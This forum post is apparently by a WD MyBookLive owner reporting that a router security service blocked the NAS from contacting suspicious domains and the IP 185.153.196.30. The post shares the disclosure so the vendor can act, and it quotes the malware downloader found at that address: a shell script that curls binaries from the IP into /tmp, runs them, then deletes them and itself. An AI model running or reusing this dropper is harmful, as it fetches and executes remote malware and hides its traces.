I posted this on reddit, but here it is and hopefully, WD can use this info.
(note edited to only include one link because I’m a new user)
My Netgear Armor started complaining that my WD MyBookLive was trying to reach a couple of URLs and that they were blocked. These were qlitrk dot com (with various sub domains such as supertrk dot qlitrk dot com) and 185.153.196.30/WSC0
I finally looked at what IP address /WSC0 contained and it was this:
#!/bin/sh
n=“OFJU”
if [ $# -gt 0 ]; then
n=$@
fi
cd /tmp
for a in $n
do
rm $a
curl -O http://185.153.196.30/$a
chmod +x $a
./$a
done
for a in $n
do
rm -rf $a
done
rm $0
I’m thankful that Netgear blackholed that 185 address but sheesh… too close for comfort.